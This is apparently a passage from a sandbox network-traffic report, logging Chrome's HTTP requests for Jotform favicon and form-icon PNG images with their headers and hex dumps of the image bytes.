                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC1390INData Raw: e3 60 2c 2c 2c c4 9b 90 c0 c7 c7 8e 99 2b c5 a8 7d 33 e6 8f 28 2a 2e a6 be fe 2c 2d cd 2d 96 1f 46 d7 75 3c 1e 0f 57 ad 58 1e 0d 10 0e 1b cf 8a a2 d0 d3 dd c3 e1 ca 4a fa fb fb 99 35 6b 16 53 32 a6 50 75 b4 8a 81 81 81 11 cf 91 15 99 92 92 12 52 92 53 38 72 e4 08 1d 1d 1d a4 a6 a6 32 7f c1 02 f2 a7 e7 33 69 d2 24 64 59 a6 b3 b3 93 ea 93 d5 9c 3c 71 62 dc ba 82 69 d0 16 16 16 e2 f1 78 38 76 ec 18 c1 60 10 80 ac ec 6c 8a 8a 8a f8 f8 d8 31 da db db 91 24 09 b7 cb 45 f9 aa 55 b4 b5 b6 52 55 55 65 b9 20 62 ab dd bc 79 f3 98 3d 77 36 69 e9 e9 0c 0e 0c 72 f6 cc 19 aa 8e 56 d1 d9 d9 69 09 d0 00 0a 0a 0a 98 9a 9b cb f1 e3 c7 e9 ec ec 44 96 65 74 5d c7 e1 70 30 6f fe 7c d2 27 a5 53 79 e8 10 81 c1 00 8b 97 94 80 61 f0 e1 87 1f 5a 81 56 5d d7 49 49 49 a1 74 59 29 3d
                                                                                                                                                                                                                                            Data Ascii: `,,,+}3(*.,--Fu<WXJ5kS2PuRS8r23i$dY<qbix8v`l1$EURUUe by=w6irViDet]p0o|'SyaZV]IIItY)=
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC1390INData Raw: 94 a4 e4 24 92 53 92 cd 9f e4 e4 e1 d3 93 84 15 9b 8b b9 0d 22 91 08 5a c4 3c e6 47 22 e1 e1 d4 16 59 c6 e3 f6 e0 f5 7a ad 7c ef 69 f9 f9 4c 9f 31 83 77 de 79 97 e6 73 e7 90 24 c9 cc 99 ee f7 47 5d 05 11 22 9a f9 86 8a 59 66 04 4d 8b 70 a1 e5 02 d9 39 d9 cc 2d 2c c4 a1 aa f4 f6 f6 5a be a1 78 c4 0a 74 99 18 ba e9 68 f3 78 cc 7c e0 bc bc 3c 16 2e 5a c4 d6 f7 b7 a2 e9 a6 c7 be b4 b4 94 70 28 44 7a 7a 3a f9 d3 a7 f3 d6 a6 b7 90 65 c9 f4 0c d7 d7 5b 51 76 5d d7 51 a2 29 b4 e1 48 98 82 82 59 7c eb c9 27 09 47 57 20 b7 db 4d fe f4 fc e1 44 b7 b8 10 52 ec a8 1d ff 03 e6 ab 36 d3 67 4c e7 d1 c7 1f a3 d7 e7 c3 e9 76 f1 f2 86 97 71 3a 9d 84 c3 21 ce b7 b4 58 3e a0 78 43 78 74 39 b1 7f 6f dd b2 85 f4 49 e9 3c fc c8 23 34 34 34 b0 7b e7 2e 8e 1d 3b 36 c6 50 17 02 ba
                                                                                                                                                                                                                                            Data Ascii: $S"Z<G"Yz|iL1wys$G]"YfMp9-,Zxthx|<.Zp(Dzz:e[Qv]Q)HY|'GW MDR6gLvq:!X>xCxt9oI<#444{.;6P
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC171INData Raw: d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 8b ff 0b d0 6c 03 a7 8e 39 36 2e 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: BH`! -BH`! -BH`! -BH`! -BH`! -BH`! -BH`! -BH`! -BH`l96.IENDB`0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            37192.168.2.1749744104.22.73.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC379OUTGET /assets/img/favicons/favicon-2021-light.png HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC667INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:01 GMT
                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                            Content-Length: 934
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:31:13 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            Age: 220
                                                                                                                                                                                                                                            last-modified: Mon, 23 Dec 2024 15:02:40 GMT
                                                                                                                                                                                                                                            etag: "88bcf8b9693d101ed0f51d5fcbed4690"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            access-control-allow-headers: Origin, Content-Type, X-Auth-Token, X-Prototype-Version, X-Requested-With
                                                                                                                                                                                                                                            access-control-allow-methods: GET, POST, PATCH, PUT, DELETE, OPTIONS
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            access-control-expose-headers: Content-Length, X-JSON
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5d869387ca0-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC702INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 90 00 00 00 90 08 03 00 00 00 d0 98 12 8a 00 00 00 c3 50 4c 54 45 ff ff ff ff 61 00 00 99 ff ff b6 29 0a 15 51 ff eb df ff b0 80 ff 75 20 10 9f ff cf ec ff a0 d8 ff ff fb f1 ff d2 79 29 32 67 ff c4 51 e1 e1 e9 a3 a7 be ef f9 ff ff f6 e4 ff ed c9 df f2 ff 40 b3 ff ff 7e 30 bf e5 ff 90 d3 ff 20 a6 ff ff c8 5f ff 9c 60 ff 88 40 ff bb 37 ff db 94 ff d6 87 ff bf 44 ff 6b 10 60 bf ff ff f1 d7 ff d7 bf ff ba 90 ff a6 70 80 cc ff 50 b9 ff d2 d3 de ff e4 af ff c4 9f 70 c6 ff f0 f0 f4 ff f5 ef ff e1 cf b3 b6 c9 a3 a7 bd ff e8 bc ff cd af 4f 57 82 19 23 5c ff 92 50 af df ff 9f d9 ff 30 ac ff c2 c5 d3 85 8a a8 84 8a a8 65 6d 92 ff ba 8f 39 41 72 ff cd 6c 3a d9 7d dd 00 00 02 9e 49 44 41 54 78 da ed d7 87 6e e2
                                                                                                                                                                                                                                            Data Ascii: PNGIHDRPLTEa)Qu y)2gQ@~0 _`@7Dk`pPpOW#\P0em9Arl:}IDATxn
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC232INData Raw: f4 23 f6 56 fc 4f 8a 1f 90 e6 a1 ea 78 4b bf 9c 4b 16 e1 61 d6 8d e3 e7 d9 04 bb 1e a9 8f cc 39 12 a5 44 1e c1 01 c1 91 88 ef 91 38 ca 1c 89 58 1e b1 df b4 e3 89 da 79 a1 05 22 10 4b d4 17 f7 c0 71 44 75 79 0f 1c 47 d4 97 f7 c0 71 44 35 79 0f 1c 43 54 c9 c0 03 c7 10 05 19 78 e0 18 a2 20 03 0f 1c 43 14 64 e0 81 63 88 ea 19 78 e0 38 a2 9e bc 07 8e 23 aa ca 7b e0 38 a2 40 de 03 c7 12 b5 c5 3d 78 4a 10 5d ed 5f eb 9e b4 07 8f 6e 7f df b1 b7 71 4f d8 83 af 09 a0 1f 48 10 0d a4 9f cd df f6 83 ee 90 50 bd 4a 9c c1 3d 04 ba 3b 75 bb 3d 02 48 26 fd 9b 52 af 7d 0f a1 96 b7 67 5b 2d d3 ae d6 e3 71 1d 96 65 59 96 65 59 96 65 59 d6 41 fd 01 64 55 43 e9 41 0e 87 b9 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                            Data Ascii: #VOxKKa9D8Xy"KqDuyGqD5yCTx Cdcx8#{8@=xJ]_nqOHPJ=;u=H&R}g[-qeYeYeYAdUCAIENDB`


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            38192.168.2.1749743104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC860OUTGET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?width=32&height=32&time=1736507717 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC1257INHTTP/1.1 302 Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:02 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:05:22 GMT
                                                                                                                                                                                                                                            jf-trace-id: 301b3bcfdacef3bf
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:36:02 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            location: https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=e4TDInN6eX2nSpbcjpEIcw&expires=1736510732&width=32&height=32
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 1840
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5d8684e43fa-EWR


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            39192.168.2.174974534.107.251.1254435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC641OUTGET /jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=BVGW99P1wnPlh67eKiG1PA&expires=1736510728&width=144&height=144 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu-files.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC504INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            access-control-allow-headers: Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, accept, origin, Cache-Control, X-Requested-With, newrelic, traceparent, tracestate
                                                                                                                                                                                                                                            access-control-allow-methods: OPTIONS, GET
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            cache-control: public,max-age=7200
                                                                                                                                                                                                                                            content-type: image/png
                                                                                                                                                                                                                                            date: Fri, 10 Jan 2025 12:36:02 GMT
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC886INData Raw: 31 66 33 61 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 90 00 00 00 90 08 06 00 00 00 e7 46 e2 b8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 b4 65 58 49 66 49 49 2a 00 08 00 00 00 06 00 12 01 03 00 01 00 00 00 01 00 00 00 1a 01 05 00 01 00 00 00 56 00 00 00 1b 01 05 00 01 00 00 00 5e 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 69 87 04 00 01 00 00 00 66 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 06 00 00 90 07 00 04 00 00 00 30 32 31 30 01 91 07 00 04 00 00 00 01 02 03 00 00 a0 07 00 04 00 00 00 30 31 30 30 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 90 00 00 00 03 a0 04 00 01 00 00 00 90 00 00 00 00 00 00 00 d6 c3 b9 fa 00 00 1e
                                                                                                                                                                                                                                            Data Ascii: 1f3aPNGIHDRFpHYseXIfII*V^(ifHH02100100
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC1390INData Raw: 1d 1d ed 9c 6f 3e 4f 24 12 06 cc 41 9c 59 50 40 28 14 e4 5c 63 13 19 99 99 64 66 66 22 c9 23 45 32 2c 1a 08 0c 0d 21 2b 0a 2e 97 d3 fa 2c 26 50 49 02 09 89 70 38 cc b9 a6 26 06 87 86 b8 62 e6 15 78 3c 5e e2 67 92 24 49 0c 0e 0c d2 d8 d4 48 30 10 64 f2 e4 c9 64 65 65 d1 d0 d0 40 5f 5f df 88 06 1b 86 41 6a 6a 2a 53 a6 4c a1 b5 b5 95 fe fe 7e 73 82 e8 06 6e 8f 9b fc 19 f9 e4 64 e7 a2 e9 1a 9d 1d 1d b4 b4 b4 d0 d7 3b fe 76 2e 49 12 99 59 99 64 64 64 d2 dd dd 4d 4b 73 f3 b8 03 63 00 39 39 39 64 64 64 d0 d6 d6 ca 85 f3 17 00 48 4a 4a 22 3b 27 07 5f 4f 0f 1d 1d 1d 23 ee d1 75 9d c4 c4 44 f2 f2 f2 e8 ec ea a2 ab b3 13 c0 6a 9b ac 28 c8 32 84 82 61 3a 3a 3b e9 ea ec 24 12 1d 78 00 55 51 c9 cd cb 25 35 35 15 c3 30 17 95 c1 81 41 5a 5b 5b f1 f9 7c 28 8a 32 b6 9e 86
                                                                                                                                                                                                                                            Data Ascii: o>O$AYP@(\cdff"#E2,!+.,&PIp8&bx<^g$IH0ddee@__Ajj*SL~snd;v.IYdddMKsc999dddHJJ";'_O#uDj(2a::;$xUQ%550AZ[[|(2
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC1390INData Raw: d8 be 83 fd fb f7 e3 76 b9 50 14 85 33 a7 4f f3 f8 d7 9e a0 64 49 09 67 cf 9c 01 4c 9b a5 a1 a1 91 4d 9b 36 31 38 30 80 aa aa bc f3 d6 db fc e8 3f 7e cc ea 5b 56 f3 da 2b af d2 d9 d9 89 1a dd a6 a6 cf 98 41 71 71 31 5b b7 6c 25 39 25 85 f9 f3 e7 71 a1 a5 c5 5c 1c 64 99 ed db b7 71 fd 0d d7 b3 fa e6 9b d9 be 6d 3b 6d ad ad e8 ba 4e 59 79 39 73 e6 ce e5 e9 9f fc 94 e6 73 e7 50 55 15 59 51 14 56 af be 99 dc 9c 1c 7e fb 9b df 72 f2 c4 09 64 59 c6 e9 74 e1 f1 7a 70 38 9d 68 91 88 25 9e f8 d9 19 3b 27 49 92 64 aa 31 fa a3 44 0d c8 f8 cf 24 59 42 56 64 eb 77 59 51 90 64 19 59 56 50 14 05 87 a2 58 86 ac 04 48 92 0c 18 18 9a 8e a1 47 7f c6 18 8a 2a ed ed 1d 6c 7c f9 65 66 cd 9e cd ed b7 df 61 6e a3 b1 ed 47 92 90 64 d9 9a f1 a6 dd 05 86 04 9a a6 a3 3a 54 dc 1e b7
                                                                                                                                                                                                                                            Data Ascii: vP3OdIgLM6180?~[V+Aqq1[l%9%q\dqm;mNYy9ssPUYQV~rdYtzp8h%;'Id1D$YBVdwYQdYVPXHG*l|efanGd:T
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC1390INData Raw: 61 48 8f 46 92 24 2a 0f 55 72 e7 5d 77 73 f5 d5 ab 38 7a e4 08 ab 56 5d cd 80 7f 80 0f 0e 1c 30 9d 77 63 ee 89 35 6b fc 32 63 1b ba e5 37 8b d6 b3 af b7 97 bf fe e5 2f 7c 5c f5 31 0b 16 2d e4 f6 3b 6e a7 ae ae 8e da da 5a 73 10 75 dd dc 5e 65 89 c6 c6 46 5e 5a bf 81 60 28 c8 9a b5 6b c8 ca ce e6 e8 91 23 74 75 76 e1 f1 78 08 06 83 cc 9c 59 40 79 79 39 79 79 79 7c f7 fb 4f a1 69 11 f3 84 99 93 8d ae 1b 14 15 cf 63 d7 ce 9d 96 2d 3a 30 30 c0 d6 f7 b7 b0 fa e6 9b a9 ad ad a5 ea 68 d5 48 1b 13 50 3b 3b 3b 69 6b 6d 63 fe c2 05 a4 a5 a5 d1 d7 db 87 d3 e9 24 18 0c 52 57 5b cb c0 c0 00 49 49 89 0c 0d 0d da 9a 55 9f 04 1d 1d 4d d3 2e 69 7f 11 3d 0d f9 fb fd bc f0 a7 17 98 bf 60 21 9f ff c2 17 38 54 51 41 24 32 56 44 0e 87 03 03 83 ee ee 6e b6 6d db 46 28 1c e6 a9
                                                                                                                                                                                                                                            Data Ascii: aHF$*Ur]ws8zV]0wc5k2c7/|\1-;nZsu^eF^Z`(k#tuvxY@yy9yyy|Oic-:00hHP;;;ikmc$RW[IIUM.i=`!8TQA$2VDnmF(
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC1390INData Raw: e3 60 2c 2c 2c c4 9b 90 c0 c7 c7 8e 99 2b c5 a8 7d 33 e6 8f 28 2a 2e a6 be fe 2c 2d cd 2d 96 1f 46 d7 75 3c 1e 0f 57 ad 58 1e 0d 10 0e 1b cf 8a a2 d0 d3 dd c3 e1 ca 4a fa fb fb 99 35 6b 16 53 32 a6 50 75 b4 8a 81 81 81 11 cf 91 15 99 92 92 12 52 92 53 38 72 e4 08 1d 1d 1d a4 a6 a6 32 7f c1 02 f2 a7 e7 33 69 d2 24 64 59 a6 b3 b3 93 ea 93 d5 9c 3c 71 62 dc ba 82 69 d0 16 16 16 e2 f1 78 38 76 ec 18 c1 60 10 80 ac ec 6c 8a 8a 8a f8 f8 d8 31 da db db 91 24 09 b7 cb 45 f9 aa 55 b4 b5 b6 52 55 55 65 b9 20 62 ab dd bc 79 f3 98 3d 77 36 69 e9 e9 0c 0e 0c 72 f6 cc 19 aa 8e 56 d1 d9 d9 69 09 d0 00 0a 0a 0a 98 9a 9b cb f1 e3 c7 e9 ec ec 44 96 65 74 5d c7 e1 70 30 6f fe 7c d2 27 a5 53 79 e8 10 81 c1 00 8b 97 94 80 61 f0 e1 87 1f 5a 81 56 5d d7 49 49 49 a1 74 59 29 3d
                                                                                                                                                                                                                                            Data Ascii: `,,,+}3(*.,--Fu<WXJ5kS2PuRS8r23i$dY<qbix8v`l1$EURUUe by=w6irViDet]p0o|'SyaZV]IIItY)=
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC1390INData Raw: 94 a4 e4 24 92 53 92 cd 9f e4 e4 e1 d3 93 84 15 9b 8b b9 0d 22 91 08 5a c4 3c e6 47 22 e1 e1 d4 16 59 c6 e3 f6 e0 f5 7a ad 7c ef 69 f9 f9 4c 9f 31 83 77 de 79 97 e6 73 e7 90 24 c9 cc 99 ee f7 47 5d 05 11 22 9a f9 86 8a 59 66 04 4d 8b 70 a1 e5 02 d9 39 d9 cc 2d 2c c4 a1 aa f4 f6 f6 5a be a1 78 c4 0a 74 99 18 ba e9 68 f3 78 cc 7c e0 bc bc 3c 16 2e 5a c4 d6 f7 b7 a2 e9 a6 c7 be b4 b4 94 70 28 44 7a 7a 3a f9 d3 a7 f3 d6 a6 b7 90 65 c9 f4 0c d7 d7 5b 51 76 5d d7 51 a2 29 b4 e1 48 98 82 82 59 7c eb c9 27 09 47 57 20 b7 db 4d fe f4 fc e1 44 b7 b8 10 52 ec a8 1d ff 03 e6 ab 36 d3 67 4c e7 d1 c7 1f a3 d7 e7 c3 e9 76 f1 f2 86 97 71 3a 9d 84 c3 21 ce b7 b4 58 3e a0 78 43 78 74 39 b1 7f 6f dd b2 85 f4 49 e9 3c fc c8 23 34 34 34 b0 7b e7 2e 8e 1d 3b 36 c6 50 17 02 ba
                                                                                                                                                                                                                                            Data Ascii: $S"Z<G"Yz|iL1wys$G]"YfMp9-,Zxthx|<.Zp(Dzz:e[Qv]Q)HY|'GW MDR6gLvq:!X>xCxt9oI<#444{.;6P
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC171INData Raw: d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 0b 21 20 81 2d 84 80 04 b6 10 02 12 d8 42 08 48 60 8b ff 0b d0 6c 03 a7 8e 39 36 2e 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: BH`! -BH`! -BH`! -BH`! -BH`! -BH`! -BH`! -BH`! -BH`l96.IENDB`0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            40192.168.2.174974634.107.251.1254435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC872OUTGET /jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=e4TDInN6eX2nSpbcjpEIcw&expires=1736510732&width=32&height=32 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu-files.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC498INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            access-control-allow-headers: Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, accept, origin, Cache-Control, X-Requested-With, newrelic, traceparent, tracestate
                                                                                                                                                                                                                                            access-control-allow-methods: OPTIONS, GET
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            cache-control: public,max-age=7200
                                                                                                                                                                                                                                            content-type: image/png
                                                                                                                                                                                                                                            date: Fri, 10 Jan 2025 12:36:02 GMT
                                                                                                                                                                                                                                            Content-Length: 1167
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC892INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 b4 65 58 49 66 49 49 2a 00 08 00 00 00 06 00 12 01 03 00 01 00 00 00 01 00 00 00 1a 01 05 00 01 00 00 00 56 00 00 00 1b 01 05 00 01 00 00 00 5e 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 69 87 04 00 01 00 00 00 66 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 06 00 00 90 07 00 04 00 00 00 30 32 31 30 01 91 07 00 04 00 00 00 01 02 03 00 00 a0 07 00 04 00 00 00 30 31 30 30 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 20 00 00 00 03 a0 04 00 01 00 00 00 20 00 00 00 00 00 00 00 91 fe d4 5f 00 00 03 81 49 44 41 54 78
                                                                                                                                                                                                                                            Data Ascii: PNGIHDR szzpHYseXIfII*V^(ifHH02100100 _IDATx
